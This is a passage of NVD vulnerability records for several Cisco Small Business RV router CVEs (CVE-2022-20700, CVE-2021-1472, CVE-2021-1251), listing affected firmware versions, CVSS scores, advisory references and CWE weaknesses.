                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0EA14E0B-442A-467D-92FF-369AD3A1A294",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "54D9FCD7-3DB5-413E-B504-8658A2D38EB7",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "30C2C2D2-9466-4A3F-A96C-166E32742C6C",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A21C17DD-A010-4744-9E06-DB845C5A1F00",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "428E4FFE-60EA-4BC1-BF13-FE50F5B093C0",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ED00C268-23EB-4743-8EF1-EEA2BE8A7566",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en los routers Cisco Small Business RV160, RV260, RV340 y RV345 Series podrían permitir a un atacante realizar cualquiera de las siguientes acciones Ejecutar código arbitrario. Elevar los privilegios. Ejecutar comandos arbitrarios. Omitir las protecciones de autenticación y autorización. Obtener y ejecutar software no firmado. Causar una denegación de servicio (DoS) Para obtener más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso",
      },
   ],
   id: "CVE-2022-20700",
   lastModified: "2024-11-21T06:43:21.503",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 10,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:N/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 10,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 10,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 6,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 9.8,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2022-02-10T18:15:09.033",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-121",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-787",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2021-04-08 04:15
Modified
2024-11-21 05:44
Summary
Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "BA1708A1-3D6B-4257-B32B-25A595EAB3B4",
                     versionEndExcluding: "1.0.01.03",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "22C0BE4B-1145-4497-8E4D-8901281C4A4B",
                     versionEndExcluding: "1.0.01.03",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "297BBB67-862F-4640-89A1-247B6BC51F37",
                     versionEndExcluding: "1.0.01.03",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "7158A7E3-1C93-46FA-B5BC-47A3049F0641",
                     versionEndExcluding: "1.0.01.03",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A2B47064-2877-44C8-BC28-F1678A5F9566",
                     versionEndExcluding: "1.0.01.03",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DB20DECC-5D66-4E87-8E19-AFCE0EC2538B",
                     versionEndExcluding: "1.0.03.21",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F1D3E083-7BC2-485B-82CD-CE3DE176A047",
                     versionEndExcluding: "1.0.03.21",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "504FBEF9-DCC1-4EE2-9F04-14E38141A03C",
                     versionEndExcluding: "1.0.03.21",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9C7C3346-DD1A-41CC-BB4D-F42CCE75A928",
                     versionEndExcluding: "1.0.03.21",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
      },
      {
         lang: "es",
         value: "Se presentan múltiples vulnerabilidades en la interfaz de administración basada en web de los enrutadores Cisco Small Business RV Series. Un atacante remoto podría ejecutar comandos arbitrarios u omitir la autenticación y cargar archivos en un dispositivo afectado. Para mayor información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso",
      },
   ],
   id: "CVE-2021-1472",
   lastModified: "2024-11-21T05:44:26.040",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "PARTIAL",
               baseScore: 7.5,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.4,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "NONE",
               baseScore: 5.3,
               baseSeverity: "MEDIUM",
               confidentialityImpact: "NONE",
               integrityImpact: "LOW",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 1.4,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 9.8,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2021-04-08T04:15:13.687",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Exploit",
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Mailing List",
            "Third Party Advisory",
         ],
         url: "http://seclists.org/fulldisclosure/2021/Apr/39",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Exploit",
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Mailing List",
            "Third Party Advisory",
         ],
         url: "http://seclists.org/fulldisclosure/2021/Apr/39",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-119",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-287",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2021-04-08 04:15
Modified
2024-11-21 05:43
Summary
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "F5759C3B-CE24-47A4-8513-A2C24028973E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv132w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "0F83DB37-F1B5-4023-B83D-F44823B162F5",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv132w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8511C48D-9EA6-4521-988C-61E1035BEFA1",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "C1E2F2A9-4118-4778-94AB-C996A6F56F0F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv134w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "976288C6-A125-48B2-BE6B-1294F26D46C9",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv134w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "39710CC4-1891-4E4B-AF65-AC2577CC8FFC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "BF13C864-9853-453C-B495-6C642DE9CB69",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "AAF5FEFC-45A0-4774-88FF-5303626C4C7E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "79A57FFD-BA26-4F6E-B45F-2DF212908843",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "E9A71045-FF96-4344-9638-6BE2EC47B9E3",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "EEE01B7F-692D-405D-938D-35E83C62D8F2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "42AA099C-B8A2-4864-9F1B-E92ED0E89995",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "CD084D1A-A03D-4854-9727-76C1FBC1A265",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "E389365B-EB1B-45CD-9BA6-1019536D27E2",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "A5DC3490-6E60-4806-874D-E23572DEAF35",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA72296B-4505-4DFA-B576-AEF67E5537CD",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "41A8558B-85AC-442A-9E3E-27EC127C5B33",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "1E4B0547-A92A-4AE2-A70C-227D1FA46ED0",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "1B8FB0F6-CAE9-481C-9FC7-69CA0660F506",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "216F3BF9-A17B-46C7-9EF6-153D531550A2",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "BEA2331F-521F-4987-83A1-6D0D458B41DB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "1DDEB88C-8545-4E12-88D8-083EEB868792",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "3E16124B-9448-47A0-A6BF-A95B37446E91",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:1.0.3.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "66F2D261-E845-4334-838A-62A4FA593FF3",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en la implementación del Link Layer Discovery Protocol (LLDP) para Enrutadores Cisco Small Business RV Series. Un atacante adyacente no autenticado podría ejecutar código arbitrario o causar que un enrutador afectado filtre la memoria del sistema o se recargue. Una pérdida de memoria o una recarga del dispositivo podrían causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Para mayor información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso. Nota: LLDP es un protocolo de Capa 2. Para explotar estas vulnerabilidades, un atacante debe estar en el mismo dominio de transmisión que el dispositivo afectado (adyacente a Capa 2)",
      },
   ],
   id: "CVE-2021-1251",
   lastModified: "2024-11-21T05:43:55.783",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "ADJACENT_NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 6.1,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:A/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 6.5,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "ADJACENT_NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.4,
